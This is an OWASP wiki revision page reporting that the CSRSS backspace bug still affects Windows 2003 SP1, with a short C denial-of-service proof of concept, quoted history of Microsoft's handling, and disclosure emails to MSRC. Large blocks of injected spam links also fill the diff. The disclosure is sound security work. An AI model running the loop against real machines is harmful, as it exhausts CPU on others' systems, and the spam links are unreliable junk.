Difference between revisions of "The CSRSS Backspace Bug still works in windows 2003 sp1"

From OWASP
Jump to: navigation, search
(Reverting to last version not containing links to s1.shard.jp)
Line 1: Line 1:
 +
[http://s1.shard.jp/galeach/new29.html myelodysplasia treatments ] [http://s1.shard.jp/olharder/44-auto-trader-nz.html automotive battery battery.familytimes.info ] [http://s1.shard.jp/bireba/kaspersky-antivirus.html mac os x antivirus download ] [http://s1.shard.jp/galeach/new76.html asian school girl movie ] [http://s1.shard.jp/olharder/automotive-tool.html ramsey auto des moines ] [http://s1.shard.jp/olharder/autoroll-654.html domain] [http://s1.shard.jp/galeach/new86.html asia attack crocodile in ] [http://s1.shard.jp/losaul/diabetes-australia.html australia south wine ] [http://s1.shard.jp/olharder/gxautos.html automatische perforierung ] [http://s1.shard.jp/losaul/australia-cost.html more information about australia ] [http://s1.shard.jp/olharder/arena-auto-auction.html automobile dealers license kansas ] [http://s1.shard.jp/bireba/mc-afee-antivirus.html lu1803 norton antivirus ] [http://s1.shard.jp/galeach/new159.html multiple endocrine neoplasias ] [http://s1.shard.jp/frhorton/9viywdetn.html south african airline ] [http://s1.shard.jp/bireba/symantic-antivirus.html downloading antivirus software ] [http://s1.shard.jp/frhorton/po4uhk6ve.html african american audio book ] [http://s1.shard.jp/olharder/bournes-auto.html auto mitsubishi mexico ] [http://s1.shard.jp/frhorton/bnd824p72.html yardley cosmetics south africa ] [http://s1.shard.jp/frhorton/bc7zse5ug.html white south african culture ] [http://s1.shard.jp/galeach/new7.html qualityasians.com password ] [http://s1.shard.jp/bireba/avp-antivirus-free.html antivirus virus definition update ] [http://s1.shard.jp/bireba/avg-vs-avast.html antivirus linux freeware ] [http://s1.shard.jp/galeach/new21.html creamy asians ] [http://s1.shard.jp/olharder/invicta-speedway.html royal auto sales inc ] [http://s1.shard.jp/bireba/avast-antivirus.html antivirus virus definition update ] [http://s1.shard.jp/olharder/automation-expense.html automation expense management] [http://s1.shard.jp/olharder/prestige-auto.html midway auto sales ] [http://s1.shard.jp/olharder/auto-part-for.html auto invite ] [http://s1.shard.jp/galeach/new56.html starving children in asia ] [http://s1.shard.jp/bireba/antivirus-download.html avant antivirus ] [http://s1.shard.jp/losaul/australia-bank.html australian shepherd nationals ] [http://s1.shard.jp/galeach/new93.html assessment australasian mathematics school ] [http://s1.shard.jp/bireba/update-norton.html antivirus for exchange servers ] [http://s1.shard.jp/losaul/australian-census.html australia sim cards ] [http://s1.shard.jp/galeach/new157.html asian sri lanka tsunami ] [http://s1.shard.jp/olharder/autoroll-654.html http] [http://s1.shard.jp/galeach/new104.html you know your asian when... ] [http://s1.shard.jp/losaul/multiplex-group.html avery labels australia ] [http://s1.shard.jp/bireba/avg-antivirus.html download norton antivirus 2005 full software ] [http://s1.shard.jp/losaul/bb-guns-for-sale.html christmas hampers australia ] [http://s1.shard.jp/bireba/review-antivirus.html winantivirus pro 2005 deluxe ] [http://s1.shard.jp/frhorton/xntk9qgnd.html medical association of south africa ] [http://s1.shard.jp/bireba/avg-antivirus.html avg antivirus command line] [http://s1.shard.jp/galeach/new20.html interesting facts about asian elephants ] [http://s1.shard.jp/losaul/australian-oil.html australian music festivals ] [http://s1.shard.jp/galeach/new177.html asians jpg ] [http://s1.shard.jp/losaul/desktop-magazine.html cheap international flights fro australia ] 
 
The bug described here [http://homepages.tesco.net/%7EJ.deBoynePollard/FGA/csrss-backspace-bug.html The CSRSS Backspace Bug in Windows NT 4/NT 2000/NT XP] and documented in this KB article: [http://support.microsoft.com/kb/311486 A Program that Passes Invalid Screen Size Parameters Causes an Access Violation] was reportetly fixed in NT/2000/Xp but a variation of it still exists in Windows 2003 Sp1
 
The bug described here [http://homepages.tesco.net/%7EJ.deBoynePollard/FGA/csrss-backspace-bug.html The CSRSS Backspace Bug in Windows NT 4/NT 2000/NT XP] and documented in this KB article: [http://support.microsoft.com/kb/311486 A Program that Passes Invalid Screen Size Parameters Causes an Access Violation] was reportetly fixed in NT/2000/Xp but a variation of it still exists in Windows 2003 Sp1
  

Revision as of 21:23, 30 May 2009

[http://s1.shard.jp/galeach/new29.html myelodysplasia treatments ] [http://s1.shard.jp/olharder/44-auto-trader-nz.html automotive battery battery.familytimes.info ] [http://s1.shard.jp/bireba/kaspersky-antivirus.html mac os x antivirus download ] [http://s1.shard.jp/galeach/new76.html asian school girl movie ] [http://s1.shard.jp/olharder/automotive-tool.html ramsey auto des moines ] domain [http://s1.shard.jp/galeach/new86.html asia attack crocodile in ] [http://s1.shard.jp/losaul/diabetes-australia.html australia south wine ] [http://s1.shard.jp/olharder/gxautos.html automatische perforierung ] [http://s1.shard.jp/losaul/australia-cost.html more information about australia ] [http://s1.shard.jp/olharder/arena-auto-auction.html automobile dealers license kansas ] [http://s1.shard.jp/bireba/mc-afee-antivirus.html lu1803 norton antivirus ] [http://s1.shard.jp/galeach/new159.html multiple endocrine neoplasias ] [http://s1.shard.jp/frhorton/9viywdetn.html south african airline ] [http://s1.shard.jp/bireba/symantic-antivirus.html downloading antivirus software ] [http://s1.shard.jp/frhorton/po4uhk6ve.html african american audio book ] [http://s1.shard.jp/olharder/bournes-auto.html auto mitsubishi mexico ] [http://s1.shard.jp/frhorton/bnd824p72.html yardley cosmetics south africa ] [http://s1.shard.jp/frhorton/bc7zse5ug.html white south african culture ] [http://s1.shard.jp/galeach/new7.html qualityasians.com password ] [http://s1.shard.jp/bireba/avp-antivirus-free.html antivirus virus definition update ] [http://s1.shard.jp/bireba/avg-vs-avast.html antivirus linux freeware ] [http://s1.shard.jp/galeach/new21.html creamy asians ] [http://s1.shard.jp/olharder/invicta-speedway.html royal auto sales inc ] [http://s1.shard.jp/bireba/avast-antivirus.html antivirus virus definition update ] automation expense management [http://s1.shard.jp/olharder/prestige-auto.html midway auto sales ] [http://s1.shard.jp/olharder/auto-part-for.html auto invite ] [http://s1.shard.jp/galeach/new56.html starving children in asia ] [http://s1.shard.jp/bireba/antivirus-download.html avant antivirus ] [http://s1.shard.jp/losaul/australia-bank.html australian shepherd nationals ] [http://s1.shard.jp/galeach/new93.html assessment australasian mathematics school ] [http://s1.shard.jp/bireba/update-norton.html antivirus for exchange servers ] [http://s1.shard.jp/losaul/australian-census.html australia sim cards ] [http://s1.shard.jp/galeach/new157.html asian sri lanka tsunami ] http [http://s1.shard.jp/galeach/new104.html you know your asian when... ] [http://s1.shard.jp/losaul/multiplex-group.html avery labels australia ] [http://s1.shard.jp/bireba/avg-antivirus.html download norton antivirus 2005 full software ] [http://s1.shard.jp/losaul/bb-guns-for-sale.html christmas hampers australia ] [http://s1.shard.jp/bireba/review-antivirus.html winantivirus pro 2005 deluxe ] [http://s1.shard.jp/frhorton/xntk9qgnd.html medical association of south africa ] avg antivirus command line [http://s1.shard.jp/galeach/new20.html interesting facts about asian elephants ] [http://s1.shard.jp/losaul/australian-oil.html australian music festivals ] [http://s1.shard.jp/galeach/new177.html asians jpg ] [http://s1.shard.jp/losaul/desktop-magazine.html cheap international flights fro australia ] The bug described here The CSRSS Backspace Bug in Windows NT 4/NT 2000/NT XP and documented in this KB article: A Program that Passes Invalid Screen Size Parameters Causes an Access Violation was reportetly fixed in NT/2000/Xp but a variation of it still exists in Windows 2003 Sp1

Basicaly just compile this and you will get a 100% processor usage by the compiled exploit and Csrss.exe

#include <stdio.h>
int main(void)
{
while(1)
printf("\t\t\b\b\b\b\b\b");
return 0;
}

Sadly, this seems to be another good example of Microsoft's disrespect for people who tried to help them, here are some snippets from the 'Service fix' section of The CSRSS Backspace Bug in Windows NT 4/NT 2000/NT XP

"... Service fix

There will not be further service packs for Windows NT 4. This is a permanent bug in Windows NT 4.

On 2002-03-23, almost five months since this bug became public knowledge and this web page was published, I received an unconfirmed report from a third party that a fixpack that includes a fix for this bug will be released, and that a knowledgebase article covering it "will" be written.

On 2002-08-01, nine and a half months since this bug became public knowledge and this web page was published, Microsoft released the third service pack for Windows NT 2000. With this service pack applied, it appears to be impossible to reproduce this bug. However, neither the change that causes this nor even the bug itself are listed anywhere in either the Windows NT 2000 service pack documentation or in Microsoft's KnowledgeBase. The problem does not officially exist, and is certainly not officially solved. The worry here is that the fact that it is no longer reproducable is coincidental, and (since Microsoft has not recognised it to actually be a problem, and therefore will not include it in any regression testing) liable to be reintroduced by subsequent service packs.

On 2002-09-09, ten and a half months since this bug became public knowledge and this web page was published, Microsoft released the first service pack for Windows NT XP. As with the Windows NT 2000 service pack, there is no official acknowledgement in the service pack documentation either that the bug exists or that it has intentionally been fixed by the service pack. I was unable myself to confirm that the bug is indeed fixed by the service pack, and no-one else had yet reported to me that it is.

On 2002-09-12, the same third party that reported the fixpack information to me reported Microsoft as saying to him that it has "a KB article that should be live soon" and that this will, when it appears, be Microsoft KnowledgeBase article ID Q311486. I confirmed that no article by that ID was currently available.

On 2002-09-24, Microsoft KnowledgeBase article ID Q311486, promised six months ago, finally appeared. Its publication date is falsified to claim that it appeared on 2001-10-26. It talks about programs that "pass invalid screen size parameters" when the sample program code that it gives for replicating the bug clearly contains nothing at all relating to screen size parameters. And the explanation that it gives for the actual cause of the problem is woefully incorrect. Were it not that it has taken over eleven months for Microsoft to produce it, one might think that this article was a very badly done rush job...."

Published 09 December 2005 10:06 by Dinis Cruz


Email to MSRC

From: "Dinis Cruz" <dinis@ddplus.net> Sent: Tuesday, December 13, 2005 11:32 PM To: secure@microsoft.com Subject: The CSRSS Backspace Bug still works in windows 2003 sp1

Dear MSRC

Please see this post The CSRSS Backspace Bug still works in windows 2003 sp1 for an issue that you should follow up and do more research.

Given the nature of this issue I think that there is a strong possibility that this can be further exploited (note that csrss runs under SYSTEM)

Best regards

Dinis Cruz

Response from MSRC

From: "Microsoft Security Response Center" <secure@microsoft.com> Sent: Wednesday, December 14, 2005 2:44 PM To: dinis@ddplus.co.uk Subject: RE: The CSRSS Backspace Bug still works in windows 2003 sp1

Hello Dinis,

Thanks for your note. I have reopened the case to investigate this and the case manager, Adrian, will be in touch when he has more information.

Thanks, Christopher, CISSP, Security+


Follow-up from MSRC

None until today (23 jul 2006)